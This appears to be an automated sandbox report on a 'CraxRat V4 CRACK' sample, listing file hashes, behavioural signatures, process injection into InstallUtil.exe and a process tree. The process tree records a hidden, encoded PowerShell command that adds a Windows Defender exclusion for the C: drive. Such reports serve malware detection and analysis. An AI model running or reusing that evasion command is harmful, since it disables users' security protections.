Overview
overview
7Static
static
7CraxRat V4...CK.exe
windows10-1703-x64
7CraxRat V4...es.dll
windows10-1703-x64
3CraxRat V4...on.dll
windows10-1703-x64
3CraxRat V4...UI.dll
windows10-1703-x64
1CraxRat V4...io.dll
windows10-1703-x64
1CraxRat V4...le.dll
windows10-1703-x64
1CraxRat V4...on.dll
windows10-1703-x64
1CraxRat V4...V4.exe
windows10-1703-x64
3CraxRat V4...ck.exe
windows10-1703-x64
7Resubmissions
24-05-2023 12:03
230524-n8dbgscd25 7Analysis
-
max time kernel
143s -
max time network
169s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
24-05-2023 12:03
Behavioral task
behavioral1
Sample
CraxRat V4 CRACK/CraxRat V4 CRACK.exe
Resource
win10-20230220-en
Behavioral task
behavioral2
Sample
CraxRat V4 CRACK/LiveChartsCountries.dll
Resource
win10-20230220-en
Behavioral task
behavioral3
Sample
CraxRat V4 CRACK/LiveChartsRegion.dll
Resource
win10-20230220-en
Behavioral task
behavioral4
Sample
CraxRat V4 CRACK/MetroSet UI.dll
Resource
win10-20230220-en
Behavioral task
behavioral5
Sample
CraxRat V4 CRACK/NAudio.dll
Resource
win10-20230220-en
Behavioral task
behavioral6
Sample
CraxRat V4 CRACK/System.IO.Compression.ZipFile.dll
Resource
win10-20230220-en
Behavioral task
behavioral7
Sample
CraxRat V4 CRACK/System.IO.Compression.dll
Resource
win10-20230220-en
Behavioral task
behavioral8
Sample
CraxRat V4 CRACK/V4.exe
Resource
win10-20230220-en
Behavioral task
behavioral9
Sample
CraxRat V4 CRACK/res/Plugins/Android/crack.exe
Resource
win10-20230220-en
General
-
Target
CraxRat V4 CRACK/CraxRat V4 CRACK.exe
-
Size
282KB
-
MD5
2d8459cff12270ee6e7a7f5ca60d2686
-
SHA1
67ae332887c21b0ef9aac516936abdd06b24aca1
-
SHA256
186dbbbb1c825368ec3a7e7a8ed8a118588a19c76dc874007175e57054525160
-
SHA512
f546d79e2fd0a693228ec05f3eef5a0c816ed67681b099b324b124ed4a38a40c70cf544589f04184e718b7c117142c8556425aa10e9470e66e2ba9cabb627b65
-
SSDEEP
3072:hRk+zfeGFUPTI7I+1zFK2my4cybWsAiTPR7P/K2Xj/skd6vknOivD3S9tvTTrbIY:hRzDjO2AS9JTrE88vwaNmSI
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3228 XsdType.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3228 set thread context of 4792 3228 XsdType.exe 80 -
Program crash 2 IoCs
pid pid_target Process procid_target 1044 4412 WerFault.exe 70 5072 4412 WerFault.exe 70 -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3400 powershell.exe 3400 powershell.exe 3400 powershell.exe 3228 XsdType.exe 3228 XsdType.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
description pid Process Token: SeDebugPrivilege 3420 crack.exe Token: SeDebugPrivilege 4412 V4.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeIncreaseQuotaPrivilege 3400 powershell.exe Token: SeSecurityPrivilege 3400 powershell.exe Token: SeTakeOwnershipPrivilege 3400 powershell.exe Token: SeLoadDriverPrivilege 3400 powershell.exe Token: SeSystemProfilePrivilege 3400 powershell.exe Token: SeSystemtimePrivilege 3400 powershell.exe Token: SeProfSingleProcessPrivilege 3400 powershell.exe Token: SeIncBasePriorityPrivilege 3400 powershell.exe Token: SeCreatePagefilePrivilege 3400 powershell.exe Token: SeBackupPrivilege 3400 powershell.exe Token: SeRestorePrivilege 3400 powershell.exe Token: SeShutdownPrivilege 3400 powershell.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeSystemEnvironmentPrivilege 3400 powershell.exe Token: SeRemoteShutdownPrivilege 3400 powershell.exe Token: SeUndockPrivilege 3400 powershell.exe Token: SeManageVolumePrivilege 3400 powershell.exe Token: 33 3400 powershell.exe Token: 34 3400 powershell.exe Token: 35 3400 powershell.exe Token: 36 3400 powershell.exe Token: SeDebugPrivilege 3228 XsdType.exe Token: SeDebugPrivilege 4792 InstallUtil.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2568 wrote to memory of 2980 2568 CraxRat V4 CRACK.exe 67 PID 2568 wrote to memory of 2980 2568 CraxRat V4 CRACK.exe 67 PID 2568 wrote to memory of 2980 2568 CraxRat V4 CRACK.exe 67 PID 2980 wrote to memory of 3420 2980 cmd.exe 69 PID 2980 wrote to memory of 3420 2980 cmd.exe 69 PID 2980 wrote to memory of 3420 2980 cmd.exe 69 PID 2980 wrote to memory of 4412 2980 cmd.exe 70 PID 2980 wrote to memory of 4412 2980 cmd.exe 70 PID 3228 wrote to memory of 4792 3228 XsdType.exe 80 PID 3228 wrote to memory of 4792 3228 XsdType.exe 80 PID 3228 wrote to memory of 4792 3228 XsdType.exe 80 PID 3228 wrote to memory of 4792 3228 XsdType.exe 80 PID 3228 wrote to memory of 4792 3228 XsdType.exe 80 PID 3228 wrote to memory of 4792 3228 XsdType.exe 80 PID 3228 wrote to memory of 4792 3228 XsdType.exe 80 PID 3228 wrote to memory of 4792 3228 XsdType.exe 80
Processes
-
C:\Users\Admin\AppData\Local\Temp\CraxRat V4 CRACK\CraxRat V4 CRACK.exe"C:\Users\Admin\AppData\Local\Temp\CraxRat V4 CRACK\CraxRat V4 CRACK.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8JGQNP1V.bat" "C:\Users\Admin\AppData\Local\Temp\CraxRat V4 CRACK\CraxRat V4 CRACK.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Users\Admin\AppData\Local\Temp\CraxRat V4 CRACK\res\Plugins\Android\crack.exeres/Plugins/Android/crack.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Users\Admin\AppData\Local\Temp\CraxRat V4 CRACK\V4.exeV4.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4412 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4412 -s 15404⤵
- Program crash
PID:1044
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4412 -s 15204⤵
- Program crash
PID:5072
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
C:\Users\Admin\AppData\Local\Data\sgtjpsny\XsdType.exeC:\Users\Admin\AppData\Local\Data\sgtjpsny\XsdType.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
621KB
MD553e9f3c1f7e1cfcf9439bc0835efd644
SHA1fd91e335c9da742f0972107a240606bb81bbc675
SHA25647e39ef464af14cffd9e2cd2951a98e61afab9e37431feb3ba0730bef88d00b4
SHA512b8835578bdfc45be76774106d5298f22915bc1d84ca39b3d9a1a4708f4dcf02a8eec8e1184644c22cd1f77b088cc731e551158ff34bb5bfcb139a48f8478940f
-
Filesize
621KB
MD553e9f3c1f7e1cfcf9439bc0835efd644
SHA1fd91e335c9da742f0972107a240606bb81bbc675
SHA25647e39ef464af14cffd9e2cd2951a98e61afab9e37431feb3ba0730bef88d00b4
SHA512b8835578bdfc45be76774106d5298f22915bc1d84ca39b3d9a1a4708f4dcf02a8eec8e1184644c22cd1f77b088cc731e551158ff34bb5bfcb139a48f8478940f
-
Filesize
59B
MD5503336035db72c6c1eeb095b68aef6f5
SHA10e186a76e55b43ae227f61d3b435a3cb117741fd
SHA256417539112ca5357dc46c5bd1f5ca059d02dfa6860cdeb962a0f693cb857beff4
SHA5120e10bb686fe0c63b9ea13c2c0ea0de16444e0c8b913468f02edfc60254925154f04bbaa079f6afa809cb5692b669136ec158c19cad744a9b403294414447584e
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a